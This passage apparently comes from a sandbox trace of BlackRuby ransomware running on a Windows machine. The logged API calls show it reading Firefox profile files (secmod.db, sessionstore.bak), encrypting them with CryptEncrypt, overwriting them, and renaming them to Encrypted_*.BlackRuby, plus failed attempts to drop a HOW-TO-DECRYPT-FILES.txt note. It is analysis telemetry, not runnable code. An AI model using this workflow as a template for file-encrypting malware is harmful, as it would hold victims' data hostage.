"c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json"), fInfoLevelId=0x0, lpFileInformation=0x1c9f678 | out: lpFileInformation=0x1c9f678*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86d6a600, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86d6a600, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86ddca20, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4153)) returned 1 [0054.361] GetLastError () returned 0x5 [0054.361] SetErrorMode (uMode=0x0) returned 0x1 [0054.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.361] GetLastError () returned 0x5 [0054.361] SetErrorMode (uMode=0x1) returned 0x0 [0054.361] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.362] GetLastError () returned 0x5 [0054.362] SetErrorMode (uMode=0x0) returned 0x1 [0054.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.363] GetLastError () returned 0x5 [0054.363] SetErrorMode (uMode=0x1) returned 0x0 [0054.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), fInfoLevelId=0x0, lpFileInformation=0x1cbd870 | out: lpFileInformation=0x1cbd870*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e2e85e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e2e85e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7e3348a0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0054.363] GetLastError () returned 0x5 [0054.363] SetErrorMode (uMode=0x0) returned 0x1 [0054.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.363] GetLastError () returned 0x5 [0054.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.363] GetLastError () returned 0x5 [0054.363] SetErrorMode (uMode=0x1) returned 0x0 [0054.363] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.363] GetLastError () returned 0x0 [0054.363] GetFileType (hFile=0x184) returned 0x1 [0054.363] SetErrorMode (uMode=0x0) returned 0x1 [0054.363] GetFileType (hFile=0x184) returned 0x1 [0054.363] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x4000 [0054.363] GetLastError () returned 0x0 [0054.363] ReadFile (in: hFile=0x184, lpBuffer=0x1cbf910, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1cbf910*, lpNumberOfBytesRead=0x18eb68*=0x4000, lpOverlapped=0x0) returned 1 [0054.365] GetLastError () returned 0x0 [0054.365] CloseHandle (hObject=0x184) returned 1 [0054.365] GetLastError () returned 0x0 [0054.365] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.365] GetLastError () returned 0x0 [0054.365] SetErrorMode (uMode=0x1) returned 0x0 [0054.365] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e2e85e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e2e85e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7e3348a0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0054.365] GetLastError () returned 0x0 [0054.365] SetErrorMode (uMode=0x0) returned 0x1 [0054.376] CryptImportKey (in: hProv=0x37c790, pbData=0x1d21d00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360aa0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.665] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ee0) returned 1 [0054.665] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1b535e8*=0x1, dwFlags=0x0) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1b535b4, dwFlags=0x0) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b53630*, pdwDataLen=0x18eb58*=0x4100, dwBufLen=0x4100 | out: pbData=0x1b53630*, pdwDataLen=0x18eb58*=0x4100) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5b85c*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b5b85c*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b5b88c*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b5b88c*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.665] GetLastError () returned 0x0 [0054.665] CryptDestroyKey (hKey=0x360aa0) returned 1 [0054.665] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.665] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0054.665] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.665] GetLastError () returned 0x0 [0054.665] SetErrorMode (uMode=0x1) returned 0x0 [0054.666] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.666] GetLastError () returned 0xb7 [0054.666] GetFileType (hFile=0x184) returned 0x1 [0054.667] SetErrorMode (uMode=0x0) returned 0x1 [0054.667] GetFileType (hFile=0x184) returned 0x1 [0054.668] CloseHandle (hObject=0x184) returned 1 [0054.668] GetLastError () returned 0xb7 [0054.668] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db", lpFilePart=0x0) returned 0x54 [0054.668] GetLastError () returned 0xb7 [0054.668] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_cau83qZZvRwliYv8UMR9K5FLCwXTBbebPLugFUEUW3zOgFu.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_cau83qZZvRwliYv8UMR9K5FLCwXTBbebPLugFUEUW3zOgFu.BlackRuby", lpFilePart=0x0) returned 0x8e [0054.668] GetLastError () returned 0xb7 [0054.668] SetErrorMode (uMode=0x1) returned 0x0 [0054.668] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e2e85e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e2e85e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x28c80360, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4110)) returned 1 [0054.668] GetLastError () returned 0xb7 [0054.668] SetErrorMode (uMode=0x0) returned 0x1 [0054.668] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_cau83qZZvRwliYv8UMR9K5FLCwXTBbebPLugFUEUW3zOgFu.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_cau83qzzvrwliyv8umr9k5flcwxtbbebplugfueuw3zogfu.blackruby")) returned 1 [0054.668] GetLastError () returned 0xb7 [0054.669] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.669] GetLastError () returned 0xb7 [0054.669] SetErrorMode (uMode=0x1) returned 0x0 [0054.669] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.669] GetLastError () returned 0x5 [0054.670] SetErrorMode (uMode=0x0) returned 0x1 [0054.670] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.670] GetLastError () returned 0x5 [0054.670] SetErrorMode (uMode=0x1) returned 0x0 [0054.670] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), fInfoLevelId=0x0, lpFileInformation=0x1b851d4 | out: lpFileInformation=0x1b851d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe9c30810, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe9c30810, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0054.680] GetLastError () returned 0x5 [0054.680] SetErrorMode (uMode=0x0) returned 0x1 [0054.680] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.680] GetLastError () returned 0x5 [0054.680] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.680] GetLastError () returned 0x5 [0054.680] SetErrorMode (uMode=0x1) returned 0x0 [0054.680] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.680] GetLastError () returned 0x0 [0054.680] GetFileType (hFile=0x184) returned 0x1 [0054.680] SetErrorMode (uMode=0x0) returned 0x1 [0054.681] GetFileType (hFile=0x184) returned 0x1 [0054.681] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x24b [0054.681] GetLastError () returned 0x0 [0054.681] ReadFile (in: hFile=0x184, lpBuffer=0x1b876e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1b876e4*, lpNumberOfBytesRead=0x18eb68*=0x24b, lpOverlapped=0x0) returned 1 [0054.681] GetLastError () returned 0x0 [0054.682] CloseHandle (hObject=0x184) returned 1 [0054.682] GetLastError () returned 0x0 [0054.682] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.682] GetLastError () returned 0x0 [0054.682] SetErrorMode (uMode=0x1) returned 0x0 [0054.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe9c30810, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe9c30810, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0054.682] GetLastError () returned 0x0 [0054.682] SetErrorMode (uMode=0x0) returned 0x1 [0054.698] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1be2d3c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360c20) returned 1 [0054.698] GetLastError () returned 0x0 [0054.698] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.698] GetLastError () returned 0x0 [0054.703] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360f20) returned 1 [0054.703] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c0fd88*=0x1, dwFlags=0x0) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c0fd54, dwFlags=0x0) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c0fdd0*, pdwDataLen=0x18eb58*=0x340, dwBufLen=0x340 | out: pbData=0x1c0fdd0*, pdwDataLen=0x18eb58*=0x340) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1047c*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c1047c*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.703] GetLastError () returned 0x0 [0054.703] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c104ac*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c104ac*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.703] GetLastError () returned 0x0 [0054.704] CryptDestroyKey (hKey=0x360c20) returned 1 [0054.704] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.704] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0054.704] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.704] GetLastError () returned 0x0 [0054.704] SetErrorMode (uMode=0x1) returned 0x0 [0054.705] GetFileType (hFile=0x184) returned 0x1 [0054.705] SetErrorMode (uMode=0x0) returned 0x1 [0054.705] GetFileType (hFile=0x184) returned 0x1 [0054.705] WriteFile (in: hFile=0x184, lpBuffer=0x1c1111c*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x18eb3c, lpOverlapped=0x0 | out: lpBuffer=0x1c1111c*, lpNumberOfBytesWritten=0x18eb3c*=0x350, lpOverlapped=0x0) returned 1 [0054.706] GetLastError () returned 0xb7 [0054.706] CloseHandle (hObject=0x184) returned 1 [0054.706] GetLastError () returned 0xb7 [0054.706] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak", lpFilePart=0x0) returned 0x5b [0054.706] GetLastError () returned 0xb7 [0054.706] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AfVygd7ByIWF3xmHwnFasnFvrBreSnp4EIQ8svO1CYItRPn.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AfVygd7ByIWF3xmHwnFasnFvrBreSnp4EIQ8svO1CYItRPn.BlackRuby", lpFilePart=0x0) returned 0x8e [0054.706] GetLastError () returned 0xb7 [0054.706] SetErrorMode (uMode=0x1) returned 0x0 [0054.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe9c30810, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0x28ccc620, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x350)) returned 1 [0054.706] GetLastError () returned 0xb7 [0054.706] SetErrorMode (uMode=0x0) returned 0x1 [0054.706] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_AfVygd7ByIWF3xmHwnFasnFvrBreSnp4EIQ8svO1CYItRPn.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_afvygd7byiwf3xmhwnfasnfvrbresnp4eiq8svo1cyitrpn.blackruby")) returned 1 [0054.706] GetLastError () returned 0xb7 [0054.707] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.707] GetLastError () returned 0xb7 [0054.707] SetErrorMode (uMode=0x1) returned 0x0 [0054.707] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.707] GetLastError () returned 0x5 [0054.709] SetErrorMode (uMode=0x0) returned 0x1 [0054.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.709] GetLastError () returned 0x5 [0054.709] SetErrorMode (uMode=0x1) returned 0x0 [0054.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), fInfoLevelId=0x0, lpFileInformation=0x1c2f4f4 | out: lpFileInformation=0x1c2f4f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xbf3cf00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xbf3cf00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0054.709] GetLastError () returned 0x5 [0054.709] SetErrorMode (uMode=0x0) returned 0x1 [0054.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.709] GetLastError () returned 0x5 [0054.709] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.709] GetLastError () returned 0x5 [0054.709] SetErrorMode (uMode=0x1) returned 0x0 